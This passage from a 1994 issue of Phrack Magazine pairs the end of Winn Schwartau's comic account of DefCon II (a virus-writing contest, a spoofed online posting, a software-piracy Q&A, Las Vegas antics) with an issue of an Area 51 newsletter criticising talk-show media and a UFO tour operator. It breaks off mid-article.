he has to say don't egg him on. Ignore him.  You want to do  what 
the  Feds  did to poor Phil Zimmerman and make him a  folk  hero?  
Turning a non-event into the lead for the evening news is not the 
way  to  make something go away. I loudly advocated  that  he  be 
treated  as a non-entity if the goal was reduction to  obscurity.   
I was right.  

Super-high priced PR and lobby firms had prepared presentation to 
wage an all-out attack on Ludwig and his contest.  I bet! And who 
was going to pay for this?  Peter Tippitt of Semantech ponied  up 
what  I believe amounted to $7,000 to get the pot going.  No  one 
else made a firm offer. Can't blame them cause it would have been 
no  more effective than taking out an ad in Time proclaiming that 
evil  is bad.  The PR firm would have made their fees, the  event 
would  have made even more news and Ludwig  would certainly  have 
had to make a judgement and choose from more than one entry.

But oddly enough, the one entry did not win.

The  winner of the Annual Virus Writing Contest was no less  than 
Bob Bales, Executive Director of the NCSA.  Not that Bob wrote  a 
program, but if  he had, Ludwig  said, it  would be called either 
Don Quixote  or Paranoia, and it would be  of the human brain at- 
tacking Meme type.  The  virus is a software equivalent of Prozac 
to  alleviate  the  suffering  in  middle-aged males  who have no 
purpose in life  other than virus busting.  

"Is Winn Schwartau here?" Mark asked the audience.  

I was there. "Yo!"  

"Would you tell Bob that he's won a plaque, and a $100 check  and 
a  full  year  subscription to the  Computer  Virus  Developments 
Quarterly."   I'm  the technology advisor to the NCSA so  it  was 
a natural request to which I was pleased to oblige.

I  told  Bob about his 15 minutes of fame at DefCon to  which  he 
roared  in laughter.  "Good! Then I won't have to  subscribe  my
self."



I  spoke  next.   Jeff introduced me by  saying,  "Winn  says  he 
doesn't  want to speak to an empty room so he's gonna talk  now."  
Some introduction. But, what a great audience!  Better than  most 
of  the security above-ground starched sphincter tight  suit  and 
tie  conference audiences I normally get.  But then again, I  get 
paid  handsomely to address legitimate audiences where I have  to 
be politically correct.  At DefCon, insulting people was the last 
thing  I  worried about.  It was what I focused on,  onstage  and 
off.

"Hey, kid.  Did you ever land Zimmerman in bed?"  

"You, you, er . . ."  

"C'mon kid. Give me your best shot."

"Your mother . . ."  A crowd gathered to see what kind of  repar
tee  this little schnook could come up with.  "Your mother ..  ."  
C'mon  kid.  You  got it in you. C'mon.  "You, she is a   .  .  . 
uh,  .  . . mother . . ." and he finally skulked  away  in  sheer 
embarrassment.   Poor kid.  When he went to the men's  room,  men 
walked out.  Poor kid.  I don't think he ever figured out it  was 
all a put on.

The audience got it, though.  Rather than go over what I  rambled 
about for an hour, here comes a blatant plug: Go buy my new  book 
"Information  Warfare:  Chaos on  the  Electronic  Superhighway."  
That'll sum it up real nice and neat.  But what a great audience. 
Thanks.

Little did I know, though, that I was also on trial.

John Markoff of the New York Times was the first to ask, and then 
a  couple of buddies asked and then a lady asked during  the  Q&A 
portion of my ad hoc ad lib speech.  "How come you did it?"   Did 
what?  "How come you flamed Lenny DeCicco?"  

It  turns  out that someone adapted my  electronic  identity  and 
logged  on to the WELL in Sausalito, CA and proceeded to  post  a 
deep  flame  against Lenny.  Among other  none-too-subtle  asper
sions, 'my' posting accused Lenny of a whole string of crimes  of 
Information Warfare and even out and out theft. 

Except,  it wasn't me.  I answered the lady's question with,  "It 
wasn't me, I don't know Lenny and I don't have an account on  the 
WELL."    That satisfied everyone except for me.   What  happened 
and  why?   It seems that Lenny's former partner in  crime  Most-
Wanted on the lam federal fugitive computer hacker Kevin  Mitnick 
actually  wrote  and  signed the letter with  his  initials.   Or 
someone  was spoofing him and me at the same time.  But why?  And 
why me?

It took a couple of days after arriving home from DefCon to learn 
after  extensive conversations with the WELL that my  erased  ac
count from almost two years ago and then re-erased on June 20  of 
this  year  was accidentally turned back on  by  some  mysterious 
administrative process that I cannot claim to fathom.  OK, that's 
what they said.  

But perhaps most interesting of the entire Getting Spoofed  inci
dent  was a single comment that Pei Chen, sysop of the WELL  said 
to  me  while I complained about how such  an  awful  anti-social 
attack was clearly reprehensible.  Oh, it's simple, she said.

"We  have no security."  Whooaaaahhh!  The WELL? No security?   I 
love  it.   I  absolutely love it.  Major  service  provider,  no 
security.  Go get 'em cowboy.

The  only  other speaker I wanted to see was Peter  Beruk,  chief 
litigator for the Software Publisher's Association.  This is  the 
Big  Software  Company sponsored organization which  attempts  to 
privately  interdict illegal software distribution as  a  prelude 
for both civil and criminal prosecutions.  And with this group of 
digital anarchists, no less.

The  SPA scrounges around 1600 private BBS's to see who's  making 
illicit  copies  of   Microsoft Word or Quattro  For  Weanies  or 
Bulgarian  for Bimbos or other legitimate software that the  pub
lishers  would  rather receive their due income from  then  being 
stolen.

"Which boards are you on?"

"That would be telling."  Big grin and laughs.

"Is your BBS secure?"  A challenge in the making.

"Sure is."

"Is that an offer to see if we can break in?"  Challenge made.

"Ahem, cough, cough." Challenge denied.

"What  name do you use on the boards?"  Idiot question  that  de
serves an idiot answer.

"Fred."  Laughs.

"You  mean  you have a full time guy to  download  software  from 
boards to see if it's legal or not?"  "Yup."

"So,  you pay people to commit felonies?"  Astutely stupid  ques
tion.

"We have permission."

"Why should we have to pay rip-off corporations too much money to 
use really shitty software?"

"So don't buy it."

"We don't.  It's so shitty that it's barely worth stealing."

"So don't steal it."

"Just want to check it out, dude."

"Scum  sucking  imperialists are making all of  the  money.   The 
software  designers  are getting ripped off by the  big  software 
bureaucracies.   Power  to the people."   Every  generation  goes 
through this naively innocent berating of capitalism.  It doesn't 
make  them  Communists (in 1950 it did), just  not  full  fledged 
capitalist  pigs themselves yet.  Soon come.  Vis a vis  Ludwig's 
comment on the asset-deprived audience.  Soon come, man.

"We go after BBS's that store illegal software."

"So you're gonna put Compuserve in jail?"  Big, big applause.  

Despite the openly verbal animosity between the free-ware believ
ers  and  the Chief Software Cop, the spirited  and  entertaining 
disagreements  maintained a healthy good natured tone  that  well 
exceed Peter's time limit, as DefCon II was coming to a close.  

It was time for one more stand up comedy attempt by a short haired 
bandanna wearing hippie/hacker/phreak who was not quite up to the 
job.

"OK,  guys.   We've had some fun at the  Feds  expense.   They're 
people, too.  So, from now on, it's Hug a Fed.  Go on, find a fed 
and go up to him or her and big them a great big bear hug full of 
love."  The Feds that had been busted were gone.  The ones  still 
successfully  undercover weren't about to blow it for a quick  feel 
from a horny teenager.

Next.   The Cliff Stoll doll with an assortment of accessory  yo-
yos  was a popular item. It was thrown pell-mell into the  crowds 
who  leapt at it with a vengeance like a baseball bleachers  sec
tion awaiting the 61st home run.

"There  used to be a Wife of Cliff Stoll doll, but no one's  seen 
it  in two years."  Cliff is strange.  I don't know if he's  that 
strange, but it was a funny bit.

"Then  we have the LoD/MoD action figure set starring Erik  Bloo
daxe  and  Phiber Optik."  GI Joe action  set  gone  underground.  
Corny,  but appreciated as hundreds of bodies dove to  catch  the 
plastic relics tossed from the stage.

If anything, an anti-climatic end to an otherwise highly informa
tive  and  educational conference.  I can hardly wait  till  next 
year  when, after word gets out, DefCon III will be  attended  by 
thousands  of hackers and cops and narks who will try to  replay   
the Summer of Cyber-Love '94 for a sequel.

			* * * * * 

More  than anything I wanted to get away from the  Sahara.   Away 
from  its nauseatingly chromatic carpets, it's hundreds  of  sur
veillance  cameras,  and  most of all, away  from  its  exploding 
toilets.  

We decided to play, and play we did at the new Luxor Hotel  which 
is an amazing pyramid with 4000+ rooms. There are no elevators as 
in  a pyramid 'going up' is kind of useless, so Inclinators  take 
passengers  up  the  30 some odd floors to  hallways  which  ring 
around the impossibly huge hollowed out pyramid shaped atrium.

This was play land.  And for three hours we played and played and 
went  to dumb shows that attract mid-western mamas  from  Noodnick, 
Kentucky, alighting in Vegas  for their annual RV pilgrimage. But  
we went and enjoyed none the less. 

The "Live TV" show was anything but live except for lovely  Susan 
who  hosted  us into the ersatz TV station.  Her job is  to  look 
pretty,  sound pretty and warm up the crowd for an  over  budget, 
overproduced schmaltz driven video projection that was to make us 
all  feel like we were on stage with Dave.  Letterman,  that  is.  
The effect does not work.  But we enjoyed ourselves, anyway.

"Everyone here on vacation?"

"No!" I yelled out.  Poor Susan was stunned.  No?  Why else would 
you be here?

"What  are  you doing?"  The TV audience of 500 was  looking  our 
way.   Between the five of us we had a million dollars  (give  or 
take) of electronic wizardry stuffed around us, beneath us and in 
our laps.  

"Working." Gee, I'm quick.

"What  do you do?"  Susan asked with a straight face.  I bet  she 
expected something like gas pumper, or nocturnal mortuary  forni
cator or 7/11 clerk.

"We're hacking for Jesus.  This is Cyber Christ!" I said pointing 
at Erik Bloodaxe.

Silence.  Dead silence again.  Sleep with Phil Zimmerman silence.  
Except for us.  We giggled like school boys.  Psyche.

"Ah,  .  . . that's nice." That was all she could come  up  with: 
That's  nice.   So  much for ad libbing  or  deviating  from  the 
script.   But  the TV audience enjoyed it.  A  whole  lot.   They 
finally  figured out it was put on.  Not every one from the  Mid-
West is as stupid as they all pretend to be.

Then  it was time to get sick.  VR rides do me in, but not to  be 
publicly  humiliated by my 20-something cohorts (and  Mike  Peros 
with  whom I had to travel yet another 2000 miles that  night)  I 
jumped right into an F-14 simulator which rotated 360 degrees  on 
two gimbals for an infinite variety of nauseousness.

"Oh, shit!" I yelled as I propelled myself forward and around and 
sideways with sufficient g-force to disgorge even the most delec
table meal.  "Oh, shit." I had reversed the throttle and was  now 
spinning  end  over end backwards.  My inner ear was  getting  my 
stomach  sick. "Oh, shit."  Out of the corner of my eyes my  four 
pals  were  doubled over in laughter.  Had I barfed yet  and  not 
known it?  God, I hope not.  "Oh, shit." I came to a dead  stand
still,  the video screen showed me plummeting to earth at  escape 
velocity and I pushed the throttle forward as roughly as I could.  
An  innate survival instinct came in to play.  "Oh,  shit!"   The 
virtual  aircraft  carrier  came into sight and  after  almost  2 
minutes of high speed rotating revulsion, I was expected to  land 
this  spinning F-14 on a thimble in the ocean.  Right.  I  tried, 
and damned if I didn't make it.  I have no idea how, but I got an 
extra  34,000  points  for a safe  landing.  120  seconds.  Ding.  
Time's up.

I got out of the simulator and spilled right onto the floor;  one 
42  year old pile of humanity who had navigated nausea but  whose 
balance  was  totally beyond repair. "Could anyone  hear  me?"  I 
asked from my knees.

"They were selling tickets."

"Do I get my money back?"

Onto  the  VR race cars.  I really thought I'd throw  up  to  the 
amusement  of a thousand onlookers. Hacking then  phreaking  then 
flying  and  now  driving.   I put the pedal  to  the  metal  and 
crashed.  The huge video display has me tipping end over end  and 
the  screen  is  shaking and the car I'm  driving  is  shuddering 
violently but my brain can't compute it all.  I'm gonna wretch, I 
just  know  it.  But I keep on driving,  decidedly  last  against 
people  who haven't been handicapped with an inner ear so  sensi
tive I get dizzy when I watch a 5" black and white TV.

We  tilted out of there and alas, it was time to find  a  200,000 
pound of metal to glide me home. It was a damn good thing I hadn't 
eaten  before VR Land, but I wolfed down $3 hot dogs at the  air
port  knowing  full well that whatever they served on  the  plane 
would be a thousand times worse.  So Mike and I munched,  leaving 
Cyber Christ and friends to battle the press and the stars at the 
opening of Planet Hollywood at Caesar's Palace.
  
And then an unexpected surprise. Lisa and friend; our first class 
objects of flirtation from the outbound trip which seemed like  a 
month ago, appeared.  But we were all so wiped out that a  conti
nent of innuendo turned into a series of short cat naps.  We  got 
a  few  flirts  in,  but nothing to write home  about.  Red  Eye   
flights are just not what they're cracked up to be.  

As  I  crawled into bed at something like 7AM  Eastern,  my  wife 
awoke  enough to ask the perennial wife question.  "What did  you 
do  all weekend?"  I, in turn, gave her the usual  husbandly  re
sponse.

"Oh, nothing.  Good night, Gracie."

			* * * * * 

(C) 1994 Winn Schwartau
Winn  Schwartau is an information security  consultant,  lecturer 
and, obviously, a writer.  Please go buy his new book:  "Informa
tion Warfare: Chaos on the Electronic Superhighway." Available at 
book   stores  everywhere.   Winn  can  be  reached  at:   Voice: 
813.393.6600 or E-mail: P00506@Psilink.com


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 21 of 28

****************************************************************************

[Several of us had plans to tempt fate and join the other pop-culture
 lemmings running off to Area 51 during Defcon.  The not-so-secret
 base has seen more press this year than Madonna.  Armed with
 our ICOM 2SRAs and a copy of "The Area 51 Viewer's Guide"
 we planned to put our lives on the line purely for the sake of
 being able to say "We were there!"

 The night before we were planning on going, FOX-TV broadcast
 an episode of "Encounters" that focused heavily on Area 51.
 The thought of tromping off on our little recon adventure
 accompanied by winnebago-loads of families taking the kids
 to see "that dang UFO place from the TV," just sorta ruined
 the mood.

 Hopefully, this won't happen to you.  And if you do go,
 you really should consider getting the "viewer's guide"
 from Glenn Campbell (psychospy@aol.com).  Email him for
 a catalog of Area 51 stuff.

 Glenn also publishes an electronic mag documenting recent activities
 surrounding Area 51, and related activities.  With his permission,
 Phrack is extremely please to bring you the latest issue of
 "The Groom Lake Desert Rat."

-----------------------------------------------------------------------------

THE GROOM LAKE DESERT RAT.   An On-Line Newsletter.
Issue #15.  Sept. 2, 1994.
 -----> "The Naked Truth from Open Sources." <-----
AREA 51/NELLIS RANGE/TTR/NTS/S-4?/WEIRD STUFF/DESERT LORE
Written, published, copyrighted and totally disavowed by 
psychospy@aol.com. See bottom for subscription/copyright info.

In this issue...
     SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
     NEW AIR FORCE STATEMENT ON GROOM
     EG&G TO ABANDON TEST SITE
     JANET "N" NUMBERS
     JANET HANDOFF FREQUENCIES
     GROOMSTOCK '94
     SOUND FAMILIAR?
     CAMPBELL ARRAIGNED
     LARRY KING NOT CLONED?
     MYSTERIOUS SIGN DISAPPEARANCE
     INTEL BITTIES

[Note: This file ends with "###".]

 ----- MEDIA COMMUNICATIONS 103A -----

SUBTLETIES OF THE TELEVISION TALK SHOW, PART I

In DR #10, we reviewed the major news media--print, radio and 
television--and showed how each could twist reality in their own 
special way.  Strictly for the sake of science, Psychospy allowed 
himself to be turned into a minor media celebrity so we could 
report to our readers the sometimes dubious processes behind the 
scenes.  There was a limit, however, to how low we would sink in 
the pursuit of knowledge.  We would not take off our clothes for 
the camera, and we would not place ourselves in any situation 
where our credibility, reputation or dignity could be seriously 
trashed. 

Now we can report that this barrier has been broken.  In the next 
two issues of the Rat we will recount our first-hand experiences 
with the lowest form of mass media, the television talk show.

 ..... THE MEDIUM OF TALK .....

Talk shows come in three basic formats.  The rarest but most 
respectable is the SERIOUS ISSUES talk show exemplified by "Meet 
the Press," "Nightline" and the roundtable discussions on PBS--
maybe even "Larry King Live."  They are dignified and serious, 
explore meaningful political and societal issues, and hardly 
anyone watches them.

The next rung down the ladder--vapid but benign--is the CELEBRITY 
CHAT talk show, like the "The Tonight Show," "Late Show with David 
Letterman" and "Arsenio Hall."  Movie stars and Big Money authors 
pump their latest work in a non-confrontational environment 
designed only to promote laughs.

The last and lowest form of the genre is the HUMAN CONFLICT talk 
show.  These syndicated programs always bear the name of the host, 
like  "Oprah," "Geraldo," "Vicky" or "Leeza."  He or she is a 
charismatic and camera-loving character, no doubt ruthless in real 
life, but blessed with the ability to convey warmth and sincerity 
on TV.  The fodder for these shows is a steady diet of human 
suffering, crises, angst and tragedy.  Former spouses and 
estranged friends face off against each other; grown men and women 
reveal to the parents their until-now-hidden perversities, and 
human oddities of all shapes and sizes present themselves for 
humiliation before a nationwide audience.  The ultimate goal of 
these shows is the public expression of private feelings.  They 
seek tears, anger, jealousy and graphic self-immolation recorded 
by the camera on a tight close-up.  With a dozen such shows now in 
syndication, the competition is intense to seek out new forms of 
conflict and expose the latest narcissistic trends.

Talk shows are produced "live on tape" with minimal editing, and 
this presents special problems for a guest.  In other forms of 
television, sound bites rule the show.  It may seem artificial, 
but tight editing at least assures that each party has their say 
and only their finest bon mot will be used.  The courteous speaker 
with a few good ideas can confidently compete with any 
extravagant, microphone-hogging blowhard, because most of what the 
blowhard says will be cut.  In the almost-live talk show, the more 
reasonable speaker has to compete with the blowhard head on.  
There is no time for an orderly presentation of evidence; he who 
makes the most outrageous, confident and colorful claims, 
groundless or not, gains the camera's eye and controls the game.

If you have any shred of personal dignity and are asked to be a 
guest on a Human Conflict show, the best response is obvious:  
"Just Say No."  Unless you are a masochist or a natural born 
actor, there is no way you can win in this format.  We know it 
now; we knew it then, but sometimes, like Oedipus, you just can't 
stop the inevitable march of Fate....

 ..... ONWARD TO HUMILIATION .....

The path to our own downfall was indirect.  For several months, a 
number of journalists have been making the pilgrimage to Freedom 
Ridge, and we generally escort them as a sort of local public 
relations representative.  We do not charge for this service, and 
we do not discriminate between journalists.  If TASS or Penthouse 
or the Podunk Review came to call, we would treat them no 
differently than the New York Times.

In May, we got a call from a producer from the Montel Williams 
Show, one of the Human Conflict shows that we had never seen.  It 
seems that "Montel," as he is known to the world, had promised on 
an earlier talk show that he would visit the border of Area 51.  
We told the producer that we would be willing to escort Montel and 
his crew to Freedom Ridge to tape a segment, but we declined an 
offer to come to New York to appear on the studio show.  Montel's 
visit was originally scheduled for May 5 but was canceled at the 
last minute, and we breathed a sign of relief.

In August, the project was reactivated, we suspect as the result 
of the June 22 article in the New York Times.  Montel's visit was 
scheduled for Aug. 16, and we were again asked if we would go to 
New York to appear on the later show.  Again, we declined.

When Montel came to Rachel, he brought a Humvee, his producers and 
a film crew.  We went through the usual script for the camera:  
Montel drives up to our Research Center, and we meet him in the 
driveway.  Inside, we show him where we are going on the map, then 
we get in the car and drive the rugged road to Freedom Ridge.  We 
had done it before with countless crews, but never so quickly and 
in so few "takes."  When Montel arrived, there was no question 
that he was in charge.  He asked no significant questions, and 
showed no particular interest in the secret base itself.  We 
sensed that he came only because he said he would and that his 
primary aim was to film a sound bite on the ridge that said, "You 
see, I did what I promised."

As we rode down from Freedom Ridge in the Humvee with Montel and 
the producer, we were again asked if we would come to New York to 
appear on the talk show the following week, Aug. 23.  We hesitated 
and were about to turn down the offer cold, when the producer 
uttered the only horrible words that could force us to comply.

Sean David Morton.

 ..... THE EMBODIMENT OF EVIL .....

We first learned of Sean Morton over two years ago, before we came 
to Rachel.  We had heard his enthusiastic endorsement of the Black 
Mailbox on a UFO video:

   "Probably the most amazing thing about Area 51 is the fact that 
this is literally the only place in the world where you can go out 
and actually see flying saucers on a timetable basis.  You can 
literally go out there on a Wednesday night between about seven 
and one a.m. and you'll see these things flying up and down the 
valley.  It's absolutely amazing.  On even a bad night you'll have 
ten, eleven, twelve sightings.  On a good night--and I've been out 
there with friends of mine camping--on a good night the sky will 
just rip open with these things.  You'll see anywhere between 
twenty to forty objects in a night testing over the base for 
anywhere from fifteen and forty minutes at a time."

We've lived near the border for over a year and a half now, are 
genuinely interested in UFOs and have spent countless days and 
nights in the desert; yet we haven't seen even ONE flying saucer, 
let alone scores.  The logical explanation is that we arrived too 
late, after the saucers had been packed up and moved elsewhere.  
The trouble with this theory is that during the early part of our 
tenure, Sean Morton continued to bring tours to the area--at $99 a 
head--and reported UFOs everywhere.

In one celebrated incident in March 1993, Psychospy spent the 
night on White Sides, overlooking Groom Lake, with some aviation 
watchers and a writer from Popular Science.  We were looking for 
the alleged Aurora spyplane--almost as ephemeral as flying 
saucers--but we saw nothing more than a few satellites, some 
distant aircraft strobes and an occasional meteor.  The following 
was reported in the March 1994 Popular Science....

   "Last March, three chilly airplane watchers with binoculars 
atop White Sides Mountain at this magic hour [4:45am] were 
tracking a 737 airliner approaching Groom Lake, as a fourth member 
of their group thawed out in his truck below.  Parked on a knoll, 
he was next to a vanload of UFO seekers.  They were lead by tour 
operator Sean Morton, whose leaflet described him as 'the world's 
foremost UFO researcher.'

   "Morton donned a horned Viking helmet and from time to time 
pointed to the sky, exclaiming: 'Look at that one!'  The airplane 
watcher trained his binoculars in the same direction but saw 
nothing out of the ordinary.  Later, Morton's group became excited 
by what they perceived as an entire formation of UFOs; the 
airplane watcher's lenses revealed only stars.  Finally, as the 
morning's first 737 made its gentle approach toward Groom Lake at 
4:45, the UFO enthusiasts rejoiced at Old Faithful's appearance.  
Everyone had seen exactly what they hoped for."

In the beginning, when we were new to the area, we were generous 
to Sean and called him "fantasy prone."  As we got to know him 
better and gained confidence in our own knowledge base, we came to 
mince no words.  Sean is a deliberate con man.  He recognizes as 
well as us the landing lights of a 737, but he knows that others 
can be fooled and taken for a $99 ride to see them.  If anyone is 
spreading disinformation about Area 51, filling the air with noise 
to make the truth harder to grasp, it isn't sinister government 
agents; it's Sean David Morton pursuing only his own greed and 
self-aggrandizement.

We have worked hard over the past 18 months to undo the damage 
Sean has done and displace him from the Area 51 scene.  
Discrediting Sean isn't complicated:  We simply quote his own 
words whenever we can.  Sean is a broadly diversified charlatan, a 
self-proclaimed expert in faith healing, earthquake prediction, 
psychic prophesy and virtually every other New Age fad.  We have 
no problem at all with him plying his trade within the confines of 
the state of California where he justly belongs, but when he 
proclaims himself the foremost authority on Area 51, we get 
territorial.  We hope that our "Area 51 Viewers Guide" has reduced 
the gullibility of newcomers and made the environment less 
attractive for leeches like him.  In fact, we haven't had a 
confirmed Morton sighting near the border in over a year.  We 
heard from sources in California that he no longer gave tours to 
Area 51 because the saucers had been moved elsewhere--which was 
fine by us.

The saucers must have returned, however.  As the recent Groom Lake 
publicity reached its peak, "The World's Foremost UFO Researcher" 
could not help but resurface to suck energy from it.  In recent 
months, reports began to reach us that he had appeared as an Area 
51 expert at UFO conferences, on radio talk shows and on the 
Montel Williams Show.  

In the latter appearance, which was first broadcast in December 
1993, Sean showed video footage of nighttime "UFOs" that he said 
he photographed "at great risk to my own life."  As we viewed them 
later, one clip showed an isolated circle of light jumping around 
within the frame.  It could have been any stationary out-of-focus 
light shot through a hand-held video camera.  Notches seen on the 
top and bottom of the "disk" correspond to protrusions inside the 
lens assembly.  In the other clip, only slightly out of focus, we 
saw the lights of a 737 landing on the Groom Lake airstrip.  To 
Sean, it was "an object actually coming in from space."  The time 
stamp in the corner said "4:49 am."

It was on this show that Montel promised to visit Area 51 escorted 
by Sean; yet when Montel finally made the trip eight months later, 
Sean was not invited.  The producer told us that word had reached 
him from many sources that Sean was considered a fraud, that in 
addition to UFOs he also did psychic prophesies and that his 
claimed credentials were highly dubious.  He and Montel felt that 
Sean had taken advantage of them and that by having him on the 
show they had inadvertently legitimized him.

But none of that prevented them from inviting him back as a guest 
the second studio show.

As we rode down in the Humvee from Freedom Ridge with Montel and 
the producer, the reality to us became crystal clear:  If we did 
not appear on the Montel Williams Show, then Sean would have the 
stage all to himself and could continue to spread any sort of 
nonsense about Area 51.  We felt that we had no choice.  Either we 
did battle with this guy now, before he grew bigger, or we would 
be cleaning up his mess for many months to come.

 ..... OUR RAPID EDUCATION .....

We had less than a week to prepare for the big show--nowhere near 
enough time to do all the research we needed.  The first item of 
business was to actually watch the Montel Williams Show and 
familiarize ourselves with the format.  We cranked up our 
satellite dish and surfed through the channels.  On "Donahue":  
"Six Year Olds Who Sexually Harass Other Six Year Olds."  On 
"Rolanda, a related topic:  "Will Your Child Grow Up To Be A 
Serial Killer?"  On "The Vicky Show," we heard that Sean Morton 
had just appeared as an expert on the prophesies of Nostradamus, 
but we were unable to catch that one.

The first Montel Williams Show we saw was, "Mistresses Who Want To 
End The Affair."  On the stage, three women disguised by dark 
sunglasses explained why they had been attracted to married men.  
We could only tolerate about ten seconds at a time of this show, 
but when we tuned back, we found that the women had shed their 
sunglasses and revealed their true identities.  Presumably, they 
had also revealed, or at least seriously compromised, the 
identities of the men they had been having the affairs with.  When 
we tuned in again later, one of the three was having an angry 
argument with a fourth female guest.  We guessed that this was the 
wife of one of the married men.

A friend sent us a tape of Montel's original UFO show in which 
Sean appeared as a "UFO Investigator" and Montel promised to 
visit.  The show included an abductee, a witness to the "Kecksburg 
Incident," a former actress, WFUFOR Sean David Morton, a requisite 
skeptic, a pro-UFO filmmaker and--as if you hadn't guessed--that 
talk show regular Travis Walton.  The show was conducted in the 
"expanding chairs" format.  It started out with two guests alone 
on the stage, then more guests and chairs were added during each 
commercial break until there were seven chairs and seven 
squabbling speakers vying for attention on the platform.  In this 
format, attention is diluted with each new chair, so the people 
who appear last, typically the skeptics, usually get only a few 
seconds of airtime.  During the free-for-all of a seven-person 
debate, the camera always focuses on the most aggressive and 
charismatic guest--i.e. Sean David Morton.

The last chair to be filled was occupied by filmmaker Russ Estes, 
who the on-screen caption said, "Does Not Believe In UFOs."  This 
is false.  He is a disciplined UFO investigator who has devoted 
his career to making films on the subject, as well as exposing 
obvious frauds.  What is true is that he "Does Not Believe In Sean 
Morton."  In his few seconds of air time, he raised doubts about 
one of Morton's many fake credentials, his claimed "Doctor of 
Divinity" degree.

RUSS ESTES:  "Montel, my biggest problem, and this is what I've 
run into over and over again, is the quality of the individual who 
is bringing me the message.  You know, the-boy-that-cried-wolf 
syndrome is phenomenal in this field.  You get people out there 
who are saying, I'm this, I'm that, and I hate to do this to you, 
Sean, but here's a guy right here who claims to be the Doctor, 
Reverend Sean David Morton.  In his own biography, he claims to 
have gotten his Doctor of Divinity at--excuse me, it will take me 
one second...."

SEAN MORTON:  "Berachah University."

RUSS ESTES:  "Berachah University, Houston, Texas--the Berachah 
Church.  I called them.  They don't have any type of degrees that 
they give.  They have Bible study at the best.  He claims to have 
attended University of Southern California...."

MONTEL WILLIAMS:  "So the point that you are making, Russ, is that 
there's a problem with the messenger, so therefore the message is 
not real."

RUSS ESTES:  "How can you believe the message if the people lie to 
you from the start."

SEAN MORTON:  "The thing I'd like to point out about Mr. Estes 
here is that if you don't like the message, you can shoot the 
messenger, and it's obvious to me that in the UFO field, we do 
this for free, we do this because we want to know the truth, 
because we have seen something...."

RUSS ESTES:  "But does that mean you bogey up your credentials?"

SEAN MORTON (angry):  "That is not true.  You are flat-out lying 
to these people.  I went to USC for four years."

Just then, the debate was cut off by a sloppy edit, and Sean's USC 
diploma appeared on the screen.  

After watching the tape, we contacted Russ Estes.  He said that 
the debate between he and Sean went on much longer than was shown 
on the screen.  "Live on tape" does not mean totally unedited.  
This show went on for over two hours to obtain a one hour's worth 
of material.  Sometimes, whole shows are thrown out when they 
don't work.  Unfortunately, Estes made a misstep on the USC 
degree.  As it turns out, this is just about the only authentic 
credential he has: a B.A. in Drama and Political Science.  We 
certainly believe the Drama part:  It's the last degree he ever 
needed.

The Doctor of Divinity degree is still phony, but in the talk show 
world, evidence counts for nothing; only emotions and presentation 
matter.  Sean walked away from the show as a brave and 
knowledgeable crusader, legitimized by a promise from Montel to 
take his tour, and with the implied invitation to reappear on the 
show.  Estes walked away alone, wasn't invited to return, and has 
since had to live down the "Does Not Believe in UFOs" moniker.  
Sean even had the delightful gall to send Estes a letter, through 
the producers...

 ---

Mr. Russ Estes
c/o Alex Williams [sic]
The Montel Williams Show
1500 Broadway Suite 700
New York, New York, 10036

Dear Russ:

I am going to assume that you are not a bold faced liar who is out 
for some kind of warped revenge, or a person who is just trying to 
make a buck off baseless slander.

Let's try to solve this like gentlemen - enclosed is a copy of my 
U.S.C. diploma.  I have also called the school and my records are 
intact.  The rest of your "research" on me is equally faulty.

I hope this solves out problem.  If not, I have consulted my 
attorney and any further slander directed toward me through your 
video series or elsewhere, will result in action taken against 
you.

Yours Truly,
[BIG signature]
Sean Morton

 ---

Things were beginning to look grim for Psychospy.  With the time 
of the taping drawing near, we hadn't even begun to scratch the 
surface of Sean David Morton and his path of destruction.  Talking 
to our contacts, we saw that Sean had accumulated a vast audience 
of intimate enemies, more than we could possibly contact.  If Sean 
sounds knowledgeable and occasionally has some meaningful 
information, it is because he has ripped it off from others.  We 
were amused to find that there was even an reputable astrologer 
who hated Sean, who felt that Sean had stolen his predictions and 
passed them off as his own.

It seemed a futile exercise anyway.  We knew all the evidence in 
the world wasn't going to matter when we actually faced off 
against Sean on camera.   We were leaving behind our own 
comfortable medium of logic and data and stepping into his home 
turf--the talk show--where presentation counts more than content.  
We were obligated by our own ethics to speak only the simplest 
truths and the cautious assertions supported by data.  Sean David 
Morton, bold faced liar that he is, faced no such constraints.  He 
could spout any lie he wanted to sound important and get himself 
off the hook, and the only thing that mattered here was that he 
said it with apparent sincerity and that it held up for 
television's thirty second attention span.  We knew that if we 
started to make an accusation about him, he would instantly sense 
the winds and make the same one against us with greater force.  
The ensuing argument would make he and us appear to be equals.

Sean knew all the buzzwords and cliches of the UFO movement and 
could spout the conventional wisdom much faster than we could.  He 
knew how to sound sincere and reasonable and adapt instantly to 
the sentiments of any social circumstance.  He was well-practiced 
at responding to inquisitions and had emerged from many without a 
scratch.  Opposing him, all we had was a body of mundane knowledge 
about a very limited area of the desert.  Sean was smooth and 
well-honed in his talk show delivery, and we were stumbling in for 
the first time to a medium where we really didn't want to be.

It was with these reservations and a sense of dark foreboding that 
we packed our bags and headed for New York City.  There, in Times 
Square, we expected a titanic battle between Good and Evil, and 
things didn't look good for Good.

[To be continued in Desert Rat #16....]

 ----- NEW AIR FORCE STATEMENT ON GROOM -----

The following statement was recently released to inquiring 
journalists by the Nellis AFB public affairs office.  (We 
requested our own copy from Major George Sillia on Aug. 26.)  It 
represents a significant shift from the previous "We know nothing 
about Groom Lake" response.

   "There are a variety of facilities throughout the Nellis Range 
Complex.  We do have facilities within the complex near the dry 
lake bed of Groom Lake.  The facilities of the Nellis Range 
Complex are used for testing and training technologies, 
operations, and systems critical to the effectiveness of U.S. 
military forces.  Specific activities conducted at Nellis cannot 
be discussed any further than that."

That's a step in the right direction.  What the base needs now is 
a name and a history.  For example, tell us about the U-2 and A-12 
programs at Groom in the 1950s and 1960s.  That's not very secret 
or critical to our current defense, so what's the point in 
pretending it is?  Will the Air Force take control of the 
situation and provide this information itself, or will the void be 
filled by a dozen aggressive entrepreneurs?

We'd bet our money on the entrepreneurs.

 ----- EG&G TO ABANDON TEST SITE ----

According to an 8/26 article in the Las Vegas Review-Journal, EG&G 
and its REECo subsidiary will not seek renewal of their Nevada 
Test Site contract when it expires in 1995.  These are two of the 
three companies that have managed the nuclear testing ground since 
its inception.  It is unclear whether this action will have any 
affect on operations at the adjoining Groom Lake base, where EG&G 
and REECo are also assumed to be major contractors.  

Recent rumors say that EG&G no longer operates the "Janet" 737 
